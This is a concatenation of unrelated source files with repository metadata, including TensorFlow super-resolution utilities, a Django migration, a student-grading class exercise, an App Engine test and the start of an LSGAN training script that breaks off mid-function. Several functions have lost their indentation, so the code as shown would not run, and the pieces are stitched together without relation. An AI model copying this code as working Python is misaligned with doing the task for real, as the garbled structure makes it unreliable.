    windows1 = np.zeros((new_height * new_width, window_size, window_size, channels), dtype=np.float32)
    windows2 = np.zeros((new_height * new_width, window_size, window_size, channels), dtype=np.float32)
    image1 = image
    image2 = np.flip(image, 1)  # horizontally flipped copy used for augmentation
    for i in range(new_height):
        for j in range(new_width):
            windows1[i * new_width + j] = image1[i * stride:i * stride + window_size, j * stride:j * stride + window_size, :]
    for i in range(new_height):
        for j in range(new_width):
            windows2[i * new_width + j] = image2[i * stride:i * stride + window_size, j * stride:j * stride + window_size, :]
    total_windows = np.concatenate((windows1, windows2), axis=0)
    return total_windows
# utilities for building graphs
def conv2d(x, w, stride, name=""):
return tf.nn.conv2d(x, w, strides=[stride, stride, 1, 1], padding="SAME", name=name + "_conv")
def conv2d_with_bias(x, w, stride, bias, add_relu=False, name=""):
    conv = conv2d(x, w, stride, name)
    if add_relu:
        return tf.nn.relu(tf.add(conv, bias, name=name + "_add"), name=name + "_relu")
    else:
        return tf.add(conv, bias, name=name + "_add")
def dilated_conv2d_with_bias(x, w, stride, bias, add_relu=False, name=""):
conv = tf.nn.atrous_conv2d(x, w, 2, padding="SAME", name=name + "_conv")
if add_relu:
return tf.nn.relu(tf.add(conv, bias, name=name + "_add"), name=name + "_relu")
else:
return tf.add(conv, bias, name=name + "_add")
def xavier_cnn_initializer(shape, uniform=True, name=None):
fan_in = shape[0] * shape[1] * shape[2]
fan_out = shape[0] * shape[1] * shape[3]
n = fan_in + fan_out
if uniform:
init_range = math.sqrt(6.0 / n)
return tf.random_uniform(shape, minval=-init_range, maxval=init_range, name=name)
else:
stddev = math.sqrt(3.0 / n)
return tf.truncated_normal(shape=shape, stddev=stddev, name=name)
def he_initializer(shape, name=None):
n = shape[0] * shape[1] * shape[2]
stddev = math.sqrt(2.0 / n)
return tf.truncated_normal(shape=shape, stddev=stddev, name=name)
def weight(shape, stddev=0.01, name=None, uniform=False, initializer="xavier"):
if initializer == "xavier":
initial = xavier_cnn_initializer(shape, uniform=uniform, name=name)
elif initializer == "he":
initial = he_initializer(shape, name=name)
elif initializer == "uniform":
initial = tf.random_uniform(shape, minval=-2.0 * stddev, maxval=2.0 * stddev)
elif initializer == "stddev":
initial = tf.truncated_normal(shape=shape, stddev=stddev)
elif initializer == "diagonal":
initial = tf.truncated_normal(shape=shape, stddev=stddev)
if len(shape) == 4:
initial = initial.eval()
i = shape[0] // 2
j = shape[1] // 2
for k in range(min(shape[2], shape[3])):
initial[i][j][k][k] = 1.0
else:
initial = tf.zeros(shape)
return tf.Variable(initial, name=name)
def bias(shape, initial_value=0.0, name=None):
if name is None:
initial = tf.constant(initial_value, shape=shape)
else:
initial = tf.constant(initial_value, shape=shape, name=name)
return tf.Variable(initial)
# utilities for logging -----
def add_summaries(scope_name, model_name, var, stddev=True, mean=False, max=False, min=False):
with tf.name_scope(scope_name):
mean_var = tf.reduce_mean(var)
if mean:
tf.summary.scalar("mean/" + model_name, mean_var)
if stddev:
stddev_var = tf.sqrt(tf.reduce_sum(tf.square(var - mean_var)))
tf.summary.scalar("stddev/" + model_name, stddev_var)
if max:
tf.summary.scalar("max/" + model_name, tf.reduce_max(var))
if min:
tf.summary.scalar("min/" + model_name, tf.reduce_min(var))
tf.summary.histogram(model_name, var)
def get_now_date():
d = datetime.datetime.today()
return "%s/%s/%s %s:%s:%s" % (d.year, d.month, d.day, d.hour, d.minute, d.second)
def get_loss_image(image1, image2, scale=1.0, border_size=0):
if len(image1.shape) == 2:
image1 = image1.reshape(image1.shape[0], image1.shape[1], 1)
if len(image2.shape) == 2:
image2 = image2.reshape(image2.shape[0], image2.shape[1], 1)
if image1.shape[0] != image2.shape[0] or image1.shape[1] != image2.shape[1] or image1.shape[2] != image2.shape[2]:
return None
if image1.dtype == np.uint8:
image1 = image1.astype(np.double)
if image2.dtype == np.uint8:
image2 = image2.astype(np.double)
loss_image = np.multiply(np.square(np.subtract(image1, image2)), scale)
loss_image = np.minimum(loss_image, 255.0)
    if border_size > 0:  # guard against the empty slice that [0:-0] would produce
        loss_image = loss_image[border_size:-border_size, border_size:-border_size, :]
return loss_image
def compute_mse(image1, image2, border_size=0):
if len(image1.shape) == 2:
image1 = image1.reshape(image1.shape[0], image1.shape[1], 1)
if len(image2.shape) == 2:
image2 = image2.reshape(image2.shape[0], image2.shape[1], 1)
if image1.shape[0] != image2.shape[0] or image1.shape[1] != image2.shape[1] or image1.shape[2] != image2.shape[2]:
return None
if image1.dtype == np.uint8:
image1 = image1.astype(np.double)
if image2.dtype == np.uint8:
image2 = image2.astype(np.double)
mse = 0.0
for i in range(border_size, image1.shape[0] - border_size):
for j in range(border_size, image1.shape[1] - border_size):
for k in range(image1.shape[2]):
error = image1[i, j, k] - image2[i, j, k]
mse += error * error
return mse / ((image1.shape[0] - 2 * border_size) * (image1.shape[1] - 2 * border_size) * image1.shape[2])
def print_CNN_weight(tensor):
print("Tensor[%s] shape=%s" % (tensor.name, str(tensor.get_shape())))
weight = tensor.eval()
for i in range(weight.shape[3]):
values = ""
for x in range(weight.shape[0]):
for y in range(weight.shape[1]):
for c in range(weight.shape[2]):
values += "%2.3f " % weight[y][x][c][i]
print(values)
print("\n")
def print_CNN_bias(tensor):
print("Tensor[%s] shape=%s" % (tensor.name, str(tensor.get_shape())))
bias = tensor.eval()
values = ""
for i in range(bias.shape[0]):
values += "%2.3f " % bias[i]
print(values + "\n")
def get_test_filenames(data_folder, dataset, scale):
test_folder = data_folder + "/" + test_datasets[dataset][0] + "/image_SRF_%d/" % scale
test_filenames = []
for i in range(test_datasets[dataset][1], test_datasets[dataset][2]):
test_filenames.append(test_folder + "img_%03d_SRF_%d_HR.png" % (i + 1, scale))
return test_filenames
def build_test_filenames(data_folder, dataset, scale):
test_filenames = []
if dataset == "all":
for test_dataset in test_datasets:
test_filenames += get_test_filenames(data_folder, test_dataset, scale)
else:
test_filenames += get_test_filenames(data_folder, dataset, scale)
return test_filenames
def get_psnr(mse, max_value=255.0):
if mse is None or mse == float('Inf') or mse == 0:
psnr = 0
else:
psnr = 20 * math.log(max_value / math.sqrt(mse), 10)
return psnr
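# Illustrative check of the formula above (added example, not part of the original file):
# for mse = 100.0 and the default max_value of 255,
# psnr = 20 * log10(255 / sqrt(100)) = 20 * log10(25.5) ≈ 28.13 dB.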
def print_num_of_total_parameters():
total_parameters = 0
parameters_string = ""
for variable in tf.trainable_variables():
shape = variable.get_shape()
variable_parameters = 1
for dim in shape:
variable_parameters *= dim.value
total_parameters += variable_parameters
parameters_string += ("%s-%d, " % (str(shape), variable_parameters))
print(parameters_string)
print("Total %d variables, %s params" % (len(tf.trainable_variables()), "{:,}".format(total_parameters)))
# utility for extracting target files from datasets
def main():
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_string("org_data_folder", "org_data", "Folder for original datasets")
flags.DEFINE_string("test_set", "all", "Test dataset. set5, set14, bsd100, urban100 or all are available")
flags.DEFINE_integer("scale", 2, "Scale for Super Resolution (can be 2 or 4)")
test_filenames = build_test_filenames(FLAGS.org_data_folder, FLAGS.test_set, FLAGS.scale)
for filename in test_filenames:
target_filename = "data/" + filename
print("[%s] > [%s]" % (filename, target_filename))
if not os.path.exists(os.path.dirname(target_filename)):
os.makedirs(os.path.dirname(target_filename))
shutil.copy(filename, target_filename)
print("OK.")
if __name__ == '__main__':
main()
|
[
"flying10101@gmail.com"
] |
flying10101@gmail.com
|
cfb1c009a31a672021f21e0d7b268494c5275f1c
|
3649895cf37988d260e409d3eb01023182619d6a
|
/findInLineWord.py
|
02a0cc1cdf49ffd742523c223c3465f5db8f6c26
|
[] |
no_license
|
guneetbrar/pyPractice
|
bb7b9720739e76e5348dbcf43e0188854121b82d
|
255dc7f5a0ba57404fc9da16f86513ed8451d4f1
|
refs/heads/main
| 2023-01-13T18:37:20.687813
| 2020-11-17T15:36:53
| 2020-11-17T15:36:53
| 301,205,506
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 134
|
py
|
fhand = open('test.txt')
for line in fhand:
line = line.rstrip()
if not '@gmail.com' in line:
continue
print(line)
|
[
"guneetsb25@gmail.com"
] |
guneetsb25@gmail.com
|
dd81a794303ed6d00e9d6a631b8f341e69601a53
|
586bd1e20882fc779f1352eab629ff78aa3c9fa2
|
/sendgrid_backend/version.py
|
bb200152c96c51b2e3037463c6bfbfae581d9433
|
[
"MIT"
] |
permissive
|
mr-napik/django-sendgrid-v5
|
58ad930c0d1bc8e9cde5d1b9e70fc57b560b6aa0
|
7b1e162347d49d1d4c72f4a891d5239adfc8a0ea
|
refs/heads/master
| 2021-05-02T13:04:06.811933
| 2018-02-08T17:01:42
| 2018-02-08T17:01:42
| 120,752,536
| 0
| 0
| null | 2018-02-08T11:24:42
| 2018-02-08T11:24:42
| null |
UTF-8
|
Python
| false
| false
| 23
|
py
|
__version__ = "0.6.86"
|
[
"steve@predata.com"
] |
steve@predata.com
|
916dc949f6c1d7d4b3f95ec28302bd150df14b7b
|
c5abc087ace887df784be3ab7012c94a6e533d9f
|
/test/testClass.py
|
315f79915b502591bb7cf4d608661e2f5c3934ec
|
[] |
no_license
|
ifhuang/azure-formation
|
bc0ec1926a6397f61c498450c6a202a595f09365
|
4db704a80c65e3e4e7d0ff18d64bfa04e7cfd407
|
refs/heads/master
| 2021-01-18T21:37:08.968600
| 2015-06-24T06:37:55
| 2015-06-24T06:37:55
| 30,116,621
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
__author__ = 'Yifu Huang'
from src.azureformation.azureoperation.service import Service
class Pao():
def __init__(self, a, b, c):
self.a = a
self.b = b
self.c = c
def funcA(self):
print Service.__module__
print Service.__name__
print Service.add_virtual_machine.__name__
def funcB(self):
print 'funcB'
Pao(1, 2, 3).funcA()
|
[
"ifhuang91@gmail.com"
] |
ifhuang91@gmail.com
|
a467d308b3b97fee6e055f6835df889fd0257c31
|
3f63371bf7cdf4e8f875a90fdf4967674bb0766e
|
/NewsPaper/NewsPaper/news/migrations/0001_initial.py
|
5f600f56afecfec31b3d1cb8337889497b2e62bb
|
[] |
no_license
|
Wistick/homeworks_skillfactory
|
c94a425b765a826d845bf428a17a8ded276790a4
|
652e1553d38e53b2a86a7c000462b624112d72d9
|
refs/heads/main
| 2023-05-03T15:07:08.104767
| 2021-05-14T14:14:10
| 2021-05-14T14:14:10
| 315,729,263
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,300
|
py
|
# Generated by Django 3.1.7 on 2021-03-31 13:58
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author_rating', models.IntegerField(default=0)),
('author_user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category_name', models.CharField(max_length=60, unique=True)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_field', models.CharField(choices=[('AR', 'Статья'), ('NE', 'Новость')], default='NE', max_length=2)),
('time_created', models.DateTimeField(auto_now_add=True, verbose_name='Дата публикации')),
('title', models.CharField(max_length=255, verbose_name='Заголовок')),
('text', models.TextField(verbose_name='Напишите сюда свой текст вашей статьи')),
('post_rating', models.IntegerField(default=0, verbose_name='Рейтинг')),
('post_author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='news.author', verbose_name='Автор')),
],
),
migrations.CreateModel(
name='PostCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='news.category')),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='news.post')),
],
),
migrations.AddField(
model_name='post',
name='post_category',
field=models.ManyToManyField(through='news.PostCategory', to='news.Category'),
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('time_created', models.DateTimeField(auto_now_add=True)),
('comment_rating', models.IntegerField(default=0)),
('comment_author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('comment_post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='news.post')),
],
),
]
|
[
"vadim.ska8@yandex.ru"
] |
vadim.ska8@yandex.ru
|
2bf364eb9a7d7b7ff5c59dd4ab1318f9930c17a8
|
067b8f7180d15375a593163b44952b82544914f5
|
/其他python/aaa.py
|
3dc45608ab790574222e200a3f17017dd74dcdf8
|
[] |
no_license
|
WenRich666/learn-note
|
fb0bfdfcddba78ccb6d35837ed2c59421907b70e
|
d4a344396380cefd9391baede824acabc916e507
|
refs/heads/master
| 2020-04-13T05:36:36.505613
| 2019-01-21T08:37:20
| 2019-01-21T08:37:20
| 162,996,885
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,087
|
py
|
# a = input("告诉我一个数字")
# b = input("告诉我另一个数字")
#
# def add(a,b):
# while True:
# a = input("告诉我一个数字")
# a = int(a)
# b = input("告诉我另一个数字")
# b = int(b)
#
# c = (a + b) * b/2
# print(c)
#
# while a == "q":
# break
#
# add(0,0)
#
# def add():
# while True:
# a = input("输入数字 a:")
# if a == "q":
# break
# b = input("输入数字 b:")
# if b == "q":
# break
#
# result = 0
#
# for i in range(int(a),int(b) + 1):
# result += str(a) + str(b)
#
# print(result)
#
# add()
class Student():
sum = 0
def __init__(self,name,age,gender,score):
self.name = name
self.age = age
self.gender = gender
self.score = score
if self.gender == "male":
print("\nHis name is " + self.name.title() + ",his age is " + str(self.age) +
",his gender is " + self.gender + ",his score is " + str(self.score) + ".")
elif self.gender == "female":
print("\nHer name is " + self.name.title() + ",her age is " + str(self.age) +
",her gender is " + self.gender + ",her score is " + str(self.score) + ".")
def examination(self):
if self.score >= 80:
print("excellent")
if 60 < self.score < 80 :
print("pass")
if self.score <= 60:
print("fail")
@classmethod
def plus_sum(cls):
cls.sum += 1
# print(cls.sum)
print("当前班级人数为:" + str(cls.sum))
student1 = Student("john",17,"male",78)
student1.examination()
Student.plus_sum()
student2 = Student("mary",16,"female",92)
student2.examination()
Student.plus_sum()
student3 = Student("bob",21,"male",43)
student3.examination()
Student.plus_sum()
student4 = Student("kate",18,"female",63)
student4.examination()
Student.plus_sum()
student5 = Student("catherine",15,"male",88)
student5.examination()
Student.plus_sum()
|
[
"940031354@qq.com"
] |
940031354@qq.com
|
55b6489b980ed4ad7ed831baf64d907a917f24c4
|
cb5abbab5007a40f488c0022da91014959885a7b
|
/tests/test_appengine_api.py
|
be29069de30a79da634abf37359adaba6fbccb81
|
[] |
no_license
|
ryangavin/stevens_hackny2011
|
e6cc9e823db6510b70a21f0197cdd7da2fd1a4c6
|
f3b09daa9b40626099559445826de8d535a1b086
|
refs/heads/master
| 2021-01-01T06:50:31.110394
| 2011-04-10T15:47:40
| 2011-04-10T15:47:40
| 1,592,213
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
"""Additional sample test file that will run along with app_tests.py"""
import unittest
from google.appengine.ext import testbed
from google.appengine.api import urlfetch
class AppEngineAPITest(unittest.TestCase):
def setUp(self):
# First, create an instance of the Testbed class.
self.testbed = testbed.Testbed()
# Then activate the testbed, which prepares the service stubs for use.
self.testbed.activate()
# Initialize urlfetch stub.
self.testbed.init_urlfetch_stub()
def tearDown(self):
self.testbed.deactivate()
def test_urlfetch(self):
response = urlfetch.fetch('http://www.google.com')
self.assertTrue(response.content.find('<html>'))
|
[
"ajshulman@gmail.com"
] |
ajshulman@gmail.com
|
7930e93940a91400b229d171cfdc37c5ed30cf8d
|
f19cdf33828cd0c0b35d07762213ac89811806fe
|
/py_37_env/bin/pip3.7
|
a75cae7e00096766c1b8cf0f61a7f79bcdbd4410
|
[] |
no_license
|
gdvorakova/whats-cooking
|
4c7c32348e2c56e8b6bb2db12edafba8b4d02f59
|
de05173d9bfc3f67cd8991573765e13af5fd302f
|
refs/heads/master
| 2022-11-14T15:34:21.239912
| 2022-04-16T10:35:19
| 2022-04-16T10:35:19
| 185,632,177
| 1
| 1
| null | 2022-10-27T14:49:31
| 2019-05-08T15:22:47
|
Python
|
UTF-8
|
Python
| false
| false
| 281
|
7
|
#!/Users/gabrieladvorakova/School/Data_mining/whats-cooking/py_37_env/bin/python3.7
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"gabdvorakova@gmail.com"
] |
gabdvorakova@gmail.com
|
f6aa5a31dad49fc2d24535d0b476a474e66caa93
|
818afee23371db486b3736e40861dbd8a4bdbccf
|
/python_work/Chapter 2/2-9.py
|
7d80db9ae7a25e354d6f02ac037e3b657fe5c8b9
|
[] |
no_license
|
BW1ll/PythonCrashCourse
|
c12a3da029652ac7eac827de040f95f9216c0967
|
8ac53cf439bc55896e8f5a6d7f52f60a6cb34ceb
|
refs/heads/master
| 2022-12-27T19:46:13.905195
| 2020-09-28T13:15:25
| 2020-09-28T13:15:25
| 297,403,097
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 67
|
py
|
fav_numb = 21
print("My favorit number is " + str(fav_numb) + ".")
|
[
"noreply@github.com"
] |
BW1ll.noreply@github.com
|
231f213e52df80c3e39913394ea56558f1802acb
|
c47466490b41101de7cf299eb0ab38564a2f2242
|
/build/racecar_base_public/planning_utils/catkin_generated/pkg.develspace.context.pc.py
|
70aa7290238b0e7241b7931e3d8dd69eddd21e8e
|
[] |
no_license
|
kleist27/FinalProject_545
|
b1beffb10ad2bc6ece76ec17afe163e5e718f8fb
|
5be47eb0b3989e581869fa0fe7a4490e6ea6a323
|
refs/heads/master
| 2020-04-08T05:42:12.293288
| 2018-12-10T03:53:03
| 2018-12-10T03:53:03
| 159,070,418
| 1
| 0
| null | 2018-12-10T03:54:04
| 2018-11-25T20:13:51
|
Makefile
|
UTF-8
|
Python
| false
| false
| 385
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "planning_utils"
PROJECT_SPACE_DIR = "/home/car-user/FinalProject_545/devel"
PROJECT_VERSION = "0.0.0"
|
[
"dylankleist@gmail.com"
] |
dylankleist@gmail.com
|
d47558441774fb9ace9df0ced14340f028f372ab
|
358d22334e78eee7ae94abebdbd341a622f31add
|
/amazon interview experience/amazon hydrabad benguluru problem.py
|
76aee1173d475957600b67a21b01379b2b950867
|
[] |
no_license
|
mihir6598/python_competitive
|
9ad1faa9c4ff50c50a8c82d7b2b20c3ed7f4f582
|
135b2c28d7200bbe7bfd2244fd17e34d9a08bdd6
|
refs/heads/main
| 2023-07-05T01:59:22.007318
| 2021-08-03T13:33:43
| 2021-08-03T13:33:43
| 339,310,299
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
def solveutil(arr,i,h,b,n,ans):
if h<n/2 and b<n/2:
ans += min(arr[i][0] + solveutil(arr,i+1,h+1,b,n,ans),arr[i][1] + solveutil(arr,i+1,h,b+1,n,ans))
elif b<n/2:
ans += arr[i][1] + solveutil(arr,i+1,h,b+1,n,ans)
elif h<n/2:
ans += arr[i][0] + solveutil(arr,i+1,h+1,b,n,ans)
return ans
def solve2(arr):
arr.sort(key=lambda x : max(x[0],x[1]),reverse=True)
print (arr)
h = 0
b = 0
n = len(arr)
ans = 0
for i in arr:
if h<n/2 and b<n/2:
if i[0]>i[1]:
ans = ans + i[1]
b += 1
else:
ans = ans + i[0]
h += 1
elif h<n/2:
ans = ans + i[0]
h += 1
elif b<n/2:
ans = ans + i[1]
b += 1
return ans
def solve(arr):
n = len(arr)
ans = 0
i = 0
h = 0
b = 0
print (solveutil(arr,i,h,b,n,ans))
print (solve2(arr))
if __name__ == "__main__":
arr = [ [100,90], [90,80], [80,70], [60,1],[4,2], [5,3]]
solve(arr)
|
[
"mihirpatel6598@gmail.com"
] |
mihirpatel6598@gmail.com
|
b33c3549762293ea977ceb562ae38ec34716f32f
|
73bc2d190b8bc3c3b4e03c4e06e850caf2d44a58
|
/train_LSGAN.py
|
39ab3bc688e23555b46d35b8e40445c9c1bf67d7
|
[
"MIT"
] |
permissive
|
masataka46/demo_LSGAN_TF
|
ee0c35cc9fcc72b15a667005a32aa836bb71d242
|
c021acdd8024214a7afc47689aa57c5680da5906
|
refs/heads/master
| 2020-03-23T06:36:04.571225
| 2018-07-17T02:45:47
| 2018-07-17T02:45:47
| 141,218,424
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,136
|
py
|
import numpy as np
import os
import tensorflow as tf
from PIL import Image
import utility as Utility
import argparse
from make_datasets_food101 import Make_datasets_food101
def parser():
parser = argparse.ArgumentParser(description='train LSGAN')
parser.add_argument('--batch_size', '-b', type=int, default=20, help='Number of images in each mini-batch')
parser.add_argument('--log_file_name', '-lf', type=str, default='log180716', help='log file name')
parser.add_argument('--epoch', '-e', type=int, default=1000, help='epoch')
parser.add_argument('--dir_name', '-dn', type=str, default='PATH/TO/DATASETS',
help='directory name of real data')
return parser.parse_args()
args = parser()
#global variants
BATCH_SIZE = args.batch_size
LOGFILE_NAME = args.log_file_name
EPOCH = args.epoch
DIR_NAME = args.dir_name
IMG_WIDTH = 64
IMG_HEIGHT = 64
NOISE_UNIT_NUM = 100
NOISE_MEAN = 0.0
NOISE_STDDEV = 1.0
TEST_DATA_SAMPLE = 5 * 5
L2_NORM = 0.001
KEEP_PROB_RATE = 0.5
SEED = 1234
np.random.seed(seed=SEED)
BOARD_DIR_NAME = './tensorboard/' + LOGFILE_NAME
out_image_dir = './out_images_LSGAN' #output image file
out_model_dir = './out_models_LSGAN' #output model file
try:
os.mkdir(out_image_dir)
os.mkdir(out_model_dir)
os.mkdir('./out_images_Debug') #for debug
except:
pass
make_datasets = Make_datasets_food101(DIR_NAME, IMG_WIDTH, IMG_HEIGHT, SEED, NOISE_MEAN, NOISE_STDDEV, TEST_DATA_SAMPLE,
NOISE_UNIT_NUM)
def leaky_relu(x, alpha):
return tf.nn.relu(x) - alpha * tf.nn.relu(-x)
def gaussian_noise(input, std): #used at discriminator
noise = tf.random_normal(shape=tf.shape(input), mean=0.0, stddev=std, dtype=tf.float32, seed=SEED)
return input + noise
#generator------------------------------------------------------------------
def generator(z, reuse=False):
with tf.variable_scope('generator', reuse=reuse):
with tf.name_scope("G_layer1"): #layer1 linear
wg1 = tf.get_variable('wg1', [NOISE_UNIT_NUM, 512 * 4 * 4], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bg1 = tf.get_variable('bg1', [512 * 4 * 4], initializer=tf.constant_initializer(0.0))
scaleg1 = tf.get_variable('sg1', [512 * 4 * 4], initializer=tf.constant_initializer(1.0))
betag1 = tf.get_variable('beg1', [512 * 4 * 4], initializer=tf.constant_initializer(0.0))
fc1 = tf.matmul(z, wg1, name='G_fc1') + bg1
#batch normalization
batch_mean1, batch_var1 = tf.nn.moments(fc1, [0])
bn1 = tf.nn.batch_normalization(fc1, batch_mean1, batch_var1, betag1, scaleg1 , 0.0001, name='G_BN1')
#leaky relu
lR1 = leaky_relu(bn1, alpha=0.2)
#reshape nx4x4x512 -> [n, 4, 4, 512]
re1 = tf.reshape(lR1, [-1, 4, 4, 512])
with tf.name_scope("G_layer2"):
#layer2 4x4x512 -> 8x8x256
wg2 = tf.get_variable('wg2', [4, 4, 256, 512], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bg2 = tf.get_variable('bg2', [256], initializer=tf.constant_initializer(0.0))
scaleg2 = tf.get_variable('sg2', [256], initializer=tf.constant_initializer(1.0))
betag2 = tf.get_variable('beg2', [256], initializer=tf.constant_initializer(0.0))
output_shape2 = tf.stack(
[tf.shape(re1)[0], tf.shape(re1)[1] * 2, tf.shape(re1)[2] * 2, tf.div(tf.shape(re1)[3], tf.constant(2))])
deconv2 = tf.nn.conv2d_transpose(re1, wg2, output_shape=output_shape2, strides=[1, 2, 2, 1],
padding="SAME") + bg2
# batch normalization
batch_mean2, batch_var2 = tf.nn.moments(deconv2, [0, 1, 2])
bn2 = tf.nn.batch_normalization(deconv2, batch_mean2, batch_var2, betag2, scaleg2, 0.0001, name='G_BN2')
# leaky relu
lR2 = leaky_relu(bn2, alpha=0.2)
with tf.name_scope("G_layer3"): # layer3 8x8x256 -> 16x16x128
wg3 = tf.get_variable('wg3', [4, 4, 128, 256], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bg3 = tf.get_variable('bg3', [128], initializer=tf.constant_initializer(0.0))
scaleg3 = tf.get_variable('sg3', [128], initializer=tf.constant_initializer(1.0))
betag3 = tf.get_variable('beg3', [128], initializer=tf.constant_initializer(0.0))
output_shape3 = tf.stack(
[tf.shape(lR2)[0], tf.shape(lR2)[1] * 2, tf.shape(lR2)[2] * 2, tf.div(tf.shape(lR2)[3], tf.constant(2))])
deconv3 = tf.nn.conv2d_transpose(lR2, wg3, output_shape=output_shape3, strides=[1, 2, 2, 1],
padding="SAME") + bg3
# batch normalization
batch_mean3, batch_var3 = tf.nn.moments(deconv3, [0, 1, 2])
bn3 = tf.nn.batch_normalization(deconv3, batch_mean3, batch_var3, betag3, scaleg3, 0.0001, name='G_BN3')
# leaky relu
lR3 = leaky_relu(bn3, alpha=0.2)
with tf.name_scope("G_layer4"): # layer4 16x16x128 -> 32x32x64
wg4 = tf.get_variable('wg4', [4, 4, 64, 128], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bg4 = tf.get_variable('bg4', [64], initializer=tf.constant_initializer(0.0))
scaleg4 = tf.get_variable('sg4', [64], initializer=tf.constant_initializer(1.0))
betag4 = tf.get_variable('beg4', [64], initializer=tf.constant_initializer(0.0))
output_shape4 = tf.stack(
# [tf.shape(lR3)[0], tf.shape(lR3)[1], tf.shape(lR3)[2], tf.shape(lR3)[3]])
[tf.shape(lR3)[0], tf.shape(lR3)[1] * 2, tf.shape(lR3)[2] * 2, tf.div(tf.shape(lR3)[3], tf.constant(2))])
deconv4 = tf.nn.conv2d_transpose(lR3, wg4, output_shape=output_shape4, strides=[1, 2, 2, 1],
padding="SAME") + bg4
# batch normalization
batch_mean4, batch_var4 = tf.nn.moments(deconv4, [0, 1, 2])
bn4 = tf.nn.batch_normalization(deconv4, batch_mean4, batch_var4, betag4, scaleg4, 0.0001, name='G_BN4')
# leaky relu
lR4 = leaky_relu(bn4, alpha=0.2)
with tf.name_scope("G_layer5"): # layer5 32x32x648 -> 64x64x3
wg5 = tf.get_variable('wg5', [4, 4, 3, 64], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bg5 = tf.get_variable('bg5', [3], initializer=tf.constant_initializer(0.0))
output_shape5 = tf.stack(
[tf.shape(lR4)[0], tf.shape(lR4)[1] * 2, tf.shape(lR4)[2] * 2, tf.constant(3)])
deconv5 = tf.nn.conv2d_transpose(lR4, wg5, output_shape=output_shape5, strides=[1, 2, 2, 1],
padding="SAME") + bg5
# tanh
tanh5 = tf.nn.tanh(deconv5)
return tanh5
#discriminator-----------------------------------------------------------------
def discriminator(x, reuse=False):
with tf.variable_scope('discriminator', reuse=reuse):
with tf.name_scope("D_layer1"): # layer1 conv1
wd1 = tf.get_variable('wd1', [3, 3, 3, 32], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bd1 = tf.get_variable('bd1', [32], initializer=tf.constant_initializer(0.0))
scaled1 = tf.get_variable('sd1', [32], initializer=tf.constant_initializer(1.0))
betad1 = tf.get_variable('bed1', [32], initializer=tf.constant_initializer(0.0))
conv1 = tf.nn.conv2d(x, wd1, strides=[1, 1, 1, 1], padding="SAME", name='D_conv1') + bd1
# batch normalization
batch_mean1, batch_var1 = tf.nn.moments(conv1, [0, 1, 2])
bn1 = tf.nn.batch_normalization(conv1, batch_mean1, batch_var1, betad1, scaled1, 0.0001, name='D_BN1')
#gaussian noise
gn1 = gaussian_noise(bn1, 0.3)
# leakyReLU function
lr1 = leaky_relu(gn1, alpha=0.2)
with tf.name_scope("D_layer2"): # layer2 conv2
wd2 = tf.get_variable('wd2', [4, 4, 32, 64], initializer=tf.random_normal_initializer
(mean=0.0, stddev=0.02, seed=SEED), dtype=tf.float32)
bd2 = tf.get_variable('bd2', [64], initializer=tf.constant_initializer(0.0))
scaled2 = tf.get_variable('sd2', [64], initializer=tf.constant_initializer(1.0))
betad2 = tf.get_variable('bed2', [64], initializer=tf.constant_initializer(0.0))
conv2 = tf.nn.conv2d(lr1, wd2, strides=[1, 2, 2, 1], padding="SAME", name='D_conv2') + bd2
# batch normalization
batch_mean2, batch_var2 = tf.nn.moments(conv2, [0, 1, 2])
bn2 = tf.nn.batch_normalization(conv2, batch_mean2, batch_var2, betad2, scaled2, 0.0001, name='D_BN2')
#gaussian noise
gn2 = gaussian_noise(bn2, 0.3)
